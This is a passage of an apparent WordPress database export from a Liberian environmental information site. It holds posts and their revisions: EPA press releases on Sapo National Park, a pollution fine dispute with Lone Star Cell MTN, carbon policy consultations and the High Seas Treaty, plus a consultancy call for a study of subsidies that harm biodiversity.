Strengthened Management, Not Elimination </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Instead of removing the park’s protected status, the EPA is recommending governance reforms, increased funding, and expanded community participation. Specific proposals include: boosting SNP’s operational budget, launching international fundraising campaigns, conducting carbon credit feasibility studies, and resolving outstanding boundary disputes with affected communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The long-term socio-ecological and economic costs of degazetting far outweigh any short-term gains,” Dr. Yarkpawolo concluded. “Our task is not to dismantle Sapo National Park, but to unlock its full potential for conservation and sustainable livelihoods.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sapo National Park, located in Sinoe County, spans 180,400 hectares and remains one of Liberia’s most important symbols of biodiversity, ecological resilience, and national pride.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Danise Love Dennis-Dodoo</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Director for Media and Communications</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Environmental Protection Agency</p>\n<!-- /wp:paragraph -->','EPA Boss Rejects Proposal to Remove Sapo National Park from Protected Status ','','inherit','closed','closed','','5567-revision-v1','','','2025-08-11 07:58:20','2025-08-11 07:58:20','',5567,'https://ekmsliberia.info/?p=5568',0,'revision','',0),(5569,38,'2025-08-11 08:14:58','2025-08-11 08:14:58','<!-- wp:paragraph -->\n<p>Monrovia, August 11, 2025 – The Executive Director of Liberia’s Environmental Protection Agency (EPA), Dr. Emmanuel K. Urey Yarkpawolo, has strongly opposed a proposal by Hon. Thomas Romeo Quiah, Representative for Sinoe County District #2, to de-gazette Sapo National Park (SNP), warning that such a move would cause “irreversible damage” to Liberia’s environmental, economic, and cultural heritage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a detailed rebuttal issued Monday, Dr. Yarkpawolo described the SNP as the nation’s “prime treasure” and the largest protected area in Liberia — home to one of the most intact tropical rainforests on Earth. The park shelters hundreds of species of mammals, birds, butterflies, and plants—many of them rare, endemic, or endangered—and plays a crucial role in maintaining ecological stability and climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Critical Ecosystem and Climate Value </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the EPA, the park forms the heart of the largest remaining portion of the Upper Guinean Forest of West Africa, acting as a global carbon sink with the capacity to store up to 29 million tons of carbon. “Degazetting would destroy Liberia’s competitive advantage in global carbon markets,” Dr. Yarkpawolo warned, noting that intact forests are central to ongoing discussions for the nation’s carbon trading policy and its commitments under the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that studies show every dollar invested in a protected area yields at least six dollars in economic returns through ecosystem services such as water purification, flood regulation, and hazard protection. The park’s ecological benefits also help reduce drought and extreme heat risks for local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Violation of Laws and International Commitments </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA chief cautioned that the proposal directly conflicts with Liberia’s Environmental Protection and Management Law (2003), the National Wildlife Conservation and Protected Area Management Law (2016), and the Forest Reform Law (2006). It would also undermine the country’s pledge to protect 30% of its forests and its obligations under global biodiversity and climate treaties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Economic Risks and Community Impact </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo rejected the notion that degazettement would benefit surrounding communities, citing past experiences with unregulated logging that left forests depleted and local people worse off. He emphasized that over 90% of park staff are hired from nearby towns, providing steady local employment—an opportunity that would be lost if protections were removed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Experience shows degazettement favors elite commercial interests over grassroots development,” he said. “It would open the door to unsustainable exploitation, rural poverty, and the erosion of community rights.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>A Call for Strengthened Management, Not Elimination </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Instead of removing the park’s protected status, the EPA is recommending governance reforms, increased funding, and expanded community participation. Specific proposals include: boosting SNP’s operational budget, launching international fundraising campaigns, conducting carbon credit feasibility studies, and resolving outstanding boundary disputes with affected communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The long-term socio-ecological and economic costs of degazetting far outweigh any short-term gains,” Dr. Yarkpawolo concluded. “Our task is not to dismantle Sapo National Park, but to unlock its full potential for conservation and sustainable livelihoods.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sapo National Park, located in Sinoe County, spans 180,400 hectares and remains one of Liberia’s most important symbols of biodiversity, ecological resilience, and national pride.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Danise Love Dennis-Dodoo</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Director for Media and Communications</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Environmental Protection Agency</p>\n<!-- /wp:paragraph -->','EPA Boss Rejects Proposal to Remove Sapo National Park from Protected Status','','inherit','closed','closed','','5567-revision-v1','','','2025-08-11 08:14:58','2025-08-11 08:14:58','',5567,'https://ekmsliberia.info/?p=5569',0,'revision','',0),(5570,38,'2025-08-13 14:34:33','2025-08-13 14:34:33','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) wishes to provide clarity on the recent FrontPage Africa story referencing the $15,000 fine levied against Lone Star Cell MTN for violations of the Environmental Protection and Management Law of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As reported, the EPA cited Lone Star Cell MTN for prolonged noise pollution from its generator facility in Congo Town, following a conclusive <a></a>decibel-level analysis carried out by our compliance and enforcement team. In line with the 2002 Environmental Protection and Management Law, the Agency imposed a fine of US$15,000 and, after failure to comply, was preparing to shut down the polluting generators.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, on May 27, 2025, Lone Star Cell MTN filed a lawsuit against the EPA before the Civil Law Court in Monrovia. The EPA’s legal team, with the full backing of the Ministry of Justice, is vigorously defending the Government’s enforcement action in court.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In furtherance of this matter, last week the EPA filed a petition before the Civil Law Court to compel LoneStar Cell MTN to pay the fine as imposed by the Government through the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirms its unwavering commitment to enforcing Liberia’s environmental laws without fear or favor, and to ensuring that all violators—regardless of size or affiliation—are held accountable for environmental harm. Our new state-of-the-art national environmental laboratory, recently launched, will greatly enhance our ability to scientifically substantiate such enforcement actions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Protecting Liberia’s environment is not optional, it is essential for the health, safety, and prosperity of our people. The EPA will continue to work with the Ministry of Justice and other government institutions to ensure that polluters face the full weight of the law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Danise Love Dennis-Dodoo</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Director of Media &amp; Corporate Communications</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Environmental Protection Agency of Liberia</p>\n<!-- /wp:paragraph -->','EPA CLARIFICATION ON FRONT PAGE AFRICA AUGUST 13, 2025 PUBLICATION','','publish','open','open','','epa-clarification-on-front-page-africa-august-13-2025-publication','','','2025-08-13 17:16:12','2025-08-13 17:16:12','',0,'https://ekmsliberia.info/?p=5570',45,'post','',0),(5571,38,'2025-08-13 14:34:15','2025-08-13 14:34:15','','EPA RESPOND','','inherit','open','closed','','epa-respond','','','2025-08-13 14:34:15','2025-08-13 14:34:15','',5570,'https://ekmsliberia.info/wp-content/uploads/2025/08/EPA-RESPOND.jpeg',0,'attachment','image/jpeg',0),(5572,38,'2025-08-13 14:34:33','2025-08-13 14:34:33','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) wishes to provide clarity on the recent FrontPage Africa story referencing the $15,000 fine levied against Lone Star Cell MTN for violations of the Environmental Protection and Management Law of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As reported, the EPA cited Lone Star Cell MTN for prolonged noise pollution from its generator facility in Congo Town, following a conclusive <a></a>decibel-level analysis carried out by our compliance and enforcement team. In line with the 2002 Environmental Protection and Management Law, the Agency imposed a fine of US$15,000 and, after failure to comply, was preparing to shut down the polluting generators.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, on May 27, 2025, Lone Star Cell MTN filed a lawsuit against the EPA before the Civil Law Court in Monrovia. The EPA’s legal team, with the full backing of the Ministry of Justice, is vigorously defending the Government’s enforcement action in court.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In furtherance of this matter, last week the EPA filed a petition before the Civil Law Court to compel LoneStar Cell MTN to pay the fine as imposed by the Government through the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirms its unwavering commitment to enforcing Liberia’s environmental laws without fear or favor, and to ensuring that all violators—regardless of size or affiliation—are held accountable for environmental harm. Our new state-of-the-art national environmental laboratory, recently launched, will greatly enhance our ability to scientifically substantiate such enforcement actions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Protecting Liberia’s environment is not optional, it is essential for the health, safety, and prosperity of our people. The EPA will continue to work with the Ministry of Justice and other government institutions to ensure that polluters face the full weight of the law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Danise Love Dennis-Dodoo</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Director of Media &amp; Corporate Communications</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Environmental Protection Agency of Liberia</p>\n<!-- /wp:paragraph -->','EPA CLARIFICATION ON FRONT PAGE AFRICA AUGUST 13, 2025 PUBLICATION','','inherit','closed','closed','','5570-revision-v1','','','2025-08-13 14:34:33','2025-08-13 14:34:33','',5570,'https://ekmsliberia.info/?p=5572',0,'revision','',0),(5573,38,'2025-10-22 14:10:17','2025-10-22 14:10:17','<strong>Background</strong>\r\n\r\nThe Government of Liberia, through the Environmental Protection Agency, under the Convention on Biological Diversity (CBD) unit, is undertaking the GEF Early Action Support Project, which aims to strengthen the country’s capacity to revise and align national biodiversity strategies with the Kunming-Montreal Global Biodiversity Framework (GBF). One of the critical focus areas is the assessment and reform of subsidies that may have harmful effects on biodiversity, in line with Target 18 of the GBF, which calls for the identification, reform, or elimination of incentives harmful to biodiversity.\r\n\r\nMany subsidies in Liberia’s forestry, agriculture, fisheries, and extractive sectors may inadvertently contribute to habitat loss, overexploitation, and environmental degradation. This consultancy seeks to identify such subsidies, assess their ecological impacts, and recommend alternatives or reforms aligned with sustainability and biodiversity conservation goals.\r\n\r\n<strong>Objectives of the Assignment</strong>\r\n\r\nThe main objective of the consultancy is to conduct an in-depth analysis of existing subsidies in Liberia and evaluate their impacts on biodiversity. The consultant will develop practical, evidence-based recommendations to support the reform or repurposing of subsidies to promote positive biodiversity outcomes.\r\n\r\n<strong>Scope of Work and Key Responsibilities</strong>\r\n\r\nUnder the supervision of the National Project Coordinator and in consultation with relevant stakeholders, the consultant will:\r\n<ol>\r\n 	<li>Conduct a comprehensive mapping of current subsidies (including direct and indirect, sectoral and cross-sectoral) relevant to agriculture, fisheries, forestry, and extractive sectors.</li>\r\n 	<li>Analyze the ecological and economic impacts of these subsidies on biodiversity, including effects on ecosystem services, protected areas, and endangered species.</li>\r\n 	<li>Identify biodiversity-harmful subsidies (BHS) using international guidance (e.g., OECD, CBD, UNEP-WCMC frameworks).</li>\r\n 	<li>Consult stakeholders including government agencies, civil society, and private sector actors to validate findings and understand subsidy mechanisms and implementation challenges.</li>\r\n 	<li>Benchmark best practices from comparable countries on subsidy reform, particularly from Africa or the Global South.</li>\r\n 	<li>Recommend policy and regulatory options for phasing out, reforming, or repurposing harmful subsidies in line with Target 18 of the GBF and national development priorities.</li>\r\n 	<li>Present findings in a stakeholder validation workshop and revise the final report based on feedback.</li>\r\n</ol>\r\nClick here: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/ToR-harmful-Subsidie.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultant - Subsidy Analysis Expert – Biodiversity Impacts and Policy Recommendations','','publish','closed','closed','','national-consultant-subsidy-analysis-expert-biodiversity-impacts-and-policy-recommendations','','','2025-10-22 11:33:13','2025-10-22 11:33:13','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5573',41,'ekms_bulletin','',0),(5574,38,'2025-08-14 14:08:14','2025-08-14 14:08:14','<strong>Background</strong>\r\n\r\nThe Government of Liberia, through the Environmental Protection Agency, under the Convention on Biological Diversity (CBD) unit, is undertaking the GEF Early Action Support Project, which aims to strengthen the country’s capacity to revise and align national biodiversity strategies with the Kunming-Montreal Global Biodiversity Framework (GBF). One of the critical focus areas is the assessment and reform of subsidies that may have harmful effects on biodiversity, in line with Target 18 of the GBF, which calls for the identification, reform, or elimination of incentives harmful to biodiversity.\r\n\r\nMany subsidies in Liberia’s forestry, agriculture, fisheries, and extractive sectors may inadvertently contribute to habitat loss, overexploitation, and environmental degradation. This consultancy seeks to identify such subsidies, assess their ecological impacts, and recommend alternatives or reforms aligned with sustainability and biodiversity conservation goals.\r\n\r\n<strong>Objectives of the Assignment</strong>\r\n\r\nThe main objective of the consultancy is to conduct an in-depth analysis of existing subsidies in Liberia and evaluate their impacts on biodiversity. The consultant will develop practical, evidence-based recommendations to support the reform or repurposing of subsidies to promote positive biodiversity outcomes.\r\n\r\n<strong>Scope of Work and Key Responsibilities</strong>\r\n\r\nUnder the supervision of the National Project Coordinator and in consultation with relevant stakeholders, the consultant will:\r\n<ol>\r\n 	<li>Conduct a comprehensive mapping of current subsidies (including direct and indirect, sectoral and cross-sectoral) relevant to agriculture, fisheries, forestry, and extractive sectors.</li>\r\n 	<li>Analyze the ecological and economic impacts of these subsidies on biodiversity, including effects on ecosystem services, protected areas, and endangered species.</li>\r\n 	<li>Identify biodiversity-harmful subsidies (BHS) using international guidance (e.g., OECD, CBD, UNEP-WCMC frameworks).</li>\r\n 	<li>Consult stakeholders including government agencies, civil society, and private sector actors to validate findings and understand subsidy mechanisms and implementation challenges.</li>\r\n 	<li>Benchmark best practices from comparable countries on subsidy reform, particularly from Africa or the Global South.</li>\r\n 	<li>Recommend policy and regulatory options for phasing out, reforming, or repurposing harmful subsidies in line with Target 18 of the GBF and national development priorities.</li>\r\n 	<li>Present findings in a stakeholder validation workshop and revise the final report based on feedback.</li>\r\n</ol>\r\nClick here:','National Consultant - Subsidy Analysis Expert – Biodiversity Impacts and Policy Recommendations','','inherit','closed','closed','','5573-revision-v1','','','2025-08-14 14:08:14','2025-08-14 14:08:14','',5573,'https://ekmsliberia.info/?p=5574',0,'revision','',0),(5575,38,'2025-08-14 14:08:58','2025-08-14 14:08:58','','ToR harmful Subsidie','','inherit','open','closed','','tor-harmful-subsidie','','','2025-08-14 14:08:58','2025-08-14 14:08:58','',0,'https://ekmsliberia.info/wp-content/uploads/2025/08/ToR-harmful-Subsidie.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5576,38,'2025-08-14 14:10:17','2025-08-14 14:10:17','<strong>Background</strong>\r\n\r\nThe Government of Liberia, through the Environmental Protection Agency, under the Convention on Biological Diversity (CBD) unit, is undertaking the GEF Early Action Support Project, which aims to strengthen the country’s capacity to revise and align national biodiversity strategies with the Kunming-Montreal Global Biodiversity Framework (GBF). One of the critical focus areas is the assessment and reform of subsidies that may have harmful effects on biodiversity, in line with Target 18 of the GBF, which calls for the identification, reform, or elimination of incentives harmful to biodiversity.\r\n\r\nMany subsidies in Liberia’s forestry, agriculture, fisheries, and extractive sectors may inadvertently contribute to habitat loss, overexploitation, and environmental degradation. This consultancy seeks to identify such subsidies, assess their ecological impacts, and recommend alternatives or reforms aligned with sustainability and biodiversity conservation goals.\r\n\r\n<strong>Objectives of the Assignment</strong>\r\n\r\nThe main objective of the consultancy is to conduct an in-depth analysis of existing subsidies in Liberia and evaluate their impacts on biodiversity. The consultant will develop practical, evidence-based recommendations to support the reform or repurposing of subsidies to promote positive biodiversity outcomes.\r\n\r\n<strong>Scope of Work and Key Responsibilities</strong>\r\n\r\nUnder the supervision of the National Project Coordinator and in consultation with relevant stakeholders, the consultant will:\r\n<ol>\r\n 	<li>Conduct a comprehensive mapping of current subsidies (including direct and indirect, sectoral and cross-sectoral) relevant to agriculture, fisheries, forestry, and extractive sectors.</li>\r\n 	<li>Analyze the ecological and economic impacts of these subsidies on biodiversity, including effects on ecosystem services, protected areas, and endangered species.</li>\r\n 	<li>Identify biodiversity-harmful subsidies (BHS) using international guidance (e.g., OECD, CBD, UNEP-WCMC frameworks).</li>\r\n 	<li>Consult stakeholders including government agencies, civil society, and private sector actors to validate findings and understand subsidy mechanisms and implementation challenges.</li>\r\n 	<li>Benchmark best practices from comparable countries on subsidy reform, particularly from Africa or the Global South.</li>\r\n 	<li>Recommend policy and regulatory options for phasing out, reforming, or repurposing harmful subsidies in line with Target 18 of the GBF and national development priorities.</li>\r\n 	<li>Present findings in a stakeholder validation workshop and revise the final report based on feedback.</li>\r\n</ol>\r\nClick here: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/ToR-harmful-Subsidie.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultant - Subsidy Analysis Expert – Biodiversity Impacts and Policy Recommendations','','inherit','closed','closed','','5573-revision-v1','','','2025-08-14 14:10:17','2025-08-14 14:10:17','',5573,'https://ekmsliberia.info/?p=5576',0,'revision','',0),(5578,38,'2025-08-16 22:14:34','2025-08-16 22:14:34','<!-- wp:paragraph -->\n<p>Gbarnga, Bong County – August 16, 2025:<br>The Environmental Protection Agency (EPA) Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has called on Liberians to take climate change seriously, stressing that the effects are already being felt across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the opening of a national multi-stakeholder consultation in Gbarnga, Bong County over the weekend, Dr. Urey Yarkpawolo said the meeting is part of efforts to develop Liberia’s first Carbon Policy and Law. The exercise, which runs from August 14 to 19, is targeting four counties – Montserrado, Margibi, Lofa, and Bong.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo thanked the Multi-stakeholder Forestry Governance and Accountability Platform (MF-GAP) and other partners for supporting the consultations. He also conveyed greetings from President Joseph Boakai, who is currently on a foreign mission in Japan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss reminded participants that climate change is not just a global problem but one that is already affecting Liberians in their daily lives. He pointed to irregular rainfall, rising sea levels, and unusual pest invasions as examples of the changing climate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our rainy season is no longer normal, our dry season is no longer normal. Even pests like the caterpillars that destroy farms are signs of climate change. If we don’t act now, the future will be dangerous for our children,” Dr. Urey Yarkpawolo warned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that forests play a key role in fighting climate change by absorbing harmful gases. According to him, Liberia’s forests and mangroves are among the most important in West Africa and can help the country benefit from the international carbon market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are blessed with more than 40% of the Upper Guinean forest. But the question is: can we manage this new resource called carbon differently from how we managed our gold and diamond? This time, we must make sure that communities and the nation benefit equally,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The consultations, he noted, are meant to gather the views of citizens, experts, and institutions to help shape a strong national carbon policy. He said the government is working to avoid unfair deals where communities receive little benefit from preserving their forests.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo added that on August 21–22, a larger meeting will be held in Ganta, Nimba County, where stakeholders will finalize recommendations that will guide the country’s carbon law and governance system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These consultations are very important. They will help us protect our forests, benefit from global agreements like the Paris Accord, and ensure that Liberia does not miss out on opportunities in the carbon market,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Gbarnga gathering follows a similar event held in Kakata, Margibi County on August 15, where stakeholders also discussed community land rights, Free Prior and Informed Consent (FPIC), and the benefits of carbon trading.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Organizers stressed that the ongoing consultations are meant to promote transparency and inclusiveness in Liberia’s climate change response.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Says Forests Key to Fighting Climate Change','','publish','open','open','','epa-executive-director-says-forests-key-to-fighting-climate-change','','','2025-08-16 22:14:38','2025-08-16 22:14:38','',0,'https://ekmsliberia.info/?p=5578',44,'post','',0),(5579,38,'2025-08-16 22:05:35','2025-08-16 22:05:35','','WhatsApp Image 2025-08-16 at 11.30.14','','inherit','open','closed','','whatsapp-image-2025-08-16-at-11-30-14','','','2025-08-16 22:05:35','2025-08-16 22:05:35','',5578,'https://ekmsliberia.info/wp-content/uploads/2025/08/WhatsApp-Image-2025-08-16-at-11.30.14.jpeg',0,'attachment','image/jpeg',0),(5580,38,'2025-08-16 22:13:46','2025-08-16 22:13:46','<!-- wp:paragraph -->\n<p>Gbarnga, Bong County – August 16, 2025:<br>The Environmental Protection Agency (EPA) Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has called on Liberians to take climate change seriously, stressing that the effects are already being felt across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the opening of a national multi-stakeholder consultation in Gbarnga, Bong County over the weekend, Dr. Urey Yarkpawolo said the meeting is part of efforts to develop Liberia’s first Carbon Policy and Law. The exercise, which runs from August 14 to 19, is targeting four counties – Montserrado, Margibi, Lofa, and Bong.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo thanked the Multi-stakeholder Forestry Governance and Accountability Platform (MF-GAP) and other partners for supporting the consultations. He also conveyed greetings from President Joseph Boakai, who is currently on a foreign mission in Japan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss reminded participants that climate change is not just a global problem but one that is already affecting Liberians in their daily lives. He pointed to irregular rainfall, rising sea levels, and unusual pest invasions as examples of the changing climate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our rainy season is no longer normal, our dry season is no longer normal. Even pests like the caterpillars that destroy farms are signs of climate change. If we don’t act now, the future will be dangerous for our children,” Dr. Urey Yarkpawolo warned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that forests play a key role in fighting climate change by absorbing harmful gases. According to him, Liberia’s forests and mangroves are among the most important in West Africa and can help the country benefit from the international carbon market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are blessed with more than 40% of the Upper Guinean forest. But the question is: can we manage this new resource called carbon differently from how we managed our gold and diamond? This time, we must make sure that communities and the nation benefit equally,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The consultations, he noted, are meant to gather the views of citizens, experts, and institutions to help shape a strong national carbon policy. He said the government is working to avoid unfair deals where communities receive little benefit from preserving their forests.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo added that on August 21–22, a larger meeting will be held in Ganta, Nimba County, where stakeholders will finalize recommendations that will guide the country’s carbon law and governance system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“These consultations are very important. They will help us protect our forests, benefit from global agreements like the Paris Accord, and ensure that Liberia does not miss out on opportunities in the carbon market,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Gbarnga gathering follows a similar event held in Kakata, Margibi County on August 15, where stakeholders also discussed community land rights, Free Prior and Informed Consent (FPIC), and the benefits of carbon trading.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Organizers stressed that the ongoing consultations are meant to promote transparency and inclusiveness in Liberia’s climate change response.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Says Forests Key to Fighting Climate Change','','inherit','closed','closed','','5578-revision-v1','','','2025-08-16 22:13:46','2025-08-16 22:13:46','',5578,'https://ekmsliberia.info/?p=5580',0,'revision','',0),(5582,38,'2025-08-18 04:40:20','2025-08-18 04:40:20','<!-- wp:paragraph -->\n<p>New York, United States of America-August 18, 2025</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia has joined nations around the world in New York for the Second Session of the Preparatory Commission for the High Seas Treaty, a landmark global pact under the United Nations Convention on the Law of the Sea (UNCLOS). The meeting, running from August 18 to 29, 2025, is being held at the UN Headquarters and focuses on preparations for the entry into force of the Agreement on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction (BBNJ Agreement).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The High Seas Treaty represents the first international framework dedicated to safeguarding marine life beyond national borders. It establishes rules for the creation of marine protected areas, the sharing of marine genetic resources, and the enforcement of environmental impact assessments for activities in international waters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s delegation reflects a broad, multi-sectoral approach to ocean governance. It includes: Atty. Rosetta N. Jackollie, Assistant Minister for Legal Affairs, Ministry of Foreign Affairs, Mr. Joseph F. Charles, BBNJ National Focal Point, Environmental Protection Agency (EPA), Mr. Austin Saye Wehye, Director for Research and Statistics, National Fisheries and Aquaculture Authority (NaFAA), Mr. Bohmensahn B. Yuan, Director of Marine and Environmental Protection, Liberia Maritime Authority (LiMA), and Mr. Michael Forkpah Garbo, Executive Director, Society for the Conservation of Nature–Liberia (SCNL)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Together, these representatives highlight Liberia’s commitment to inclusive participation, bringing together government ministries, regulatory agencies, and civil society to shape the future of ocean protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking ahead of the session, Mr. Joseph F. Charles emphasized that Liberia’s participation demonstrates its determination to ensure national and regional priorities are reflected in global decisions on ocean governance. He described the gathering as “a pivotal opportunity to align Liberia’s ecological, economic, and diplomatic interests with international commitments to safeguard the ocean.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s engagement in the treaty process also underscores its support for the global “30x30” goal—protecting 30 percent of the world’s oceans by 2030. The country recognizes the ocean’s critical role in preserving biodiversity, supporting food security, regulating climate, and driving sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By taking part in this historic process, Liberia is reinforcing its commitment to sustainable fisheries, marine biodiversity protection, and regional collaboration under initiatives such as the Guinea Current Large Marine Ecosystem. With its active delegation in New York, Liberia is demonstrating leadership and vision in global ocean conservation and affirming its role as a vital partner in bringing the High Seas Treaty into force—for the benefit of present and future generations.</p>\n<!-- /wp:paragraph -->','Liberia Joins Global Push for the High Seas Treaty at the United Nations','','publish','open','open','','liberia-joins-global-push-for-the-high-seas-treaty-at-the-united-nations','','','2025-08-20 04:45:37','2025-08-20 04:45:37','',0,'https://ekmsliberia.info/?p=5582',43,'post','',0),(5583,38,'2025-08-20 04:45:18','2025-08-20 04:45:18','','NUGA PIC','','inherit','open','closed','','nuga-pic','','','2025-08-20 04:45:18','2025-08-20 04:45:18','',5582,'https://ekmsliberia.info/wp-content/uploads/2025/08/NUGA-PIC.jpeg',0,'attachment','image/jpeg',0),(5584,38,'2025-08-20 04:45:34','2025-08-20 04:45:34','<!-- wp:paragraph -->\n<p>New York, United States of America-August 18, 2025</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia has joined nations around the world in New York for the Second Session of the Preparatory Commission for the High Seas Treaty, a landmark global pact under the United Nations Convention on the Law of the Sea (UNCLOS). The meeting, running from August 18 to 29, 2025, is being held at the UN Headquarters and focuses on preparations for the entry into force of the Agreement on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction (BBNJ Agreement).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The High Seas Treaty represents the first international framework dedicated to safeguarding marine life beyond national borders. It establishes rules for the creation of marine protected areas, the sharing of marine genetic resources, and the enforcement of environmental impact assessments for activities in international waters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s delegation reflects a broad, multi-sectoral approach to ocean governance. It includes: Atty. Rosetta N. Jackollie, Assistant Minister for Legal Affairs, Ministry of Foreign Affairs, Mr. Joseph F. Charles, BBNJ National Focal Point, Environmental Protection Agency (EPA), Mr. Austin Saye Wehye, Director for Research and Statistics, National Fisheries and 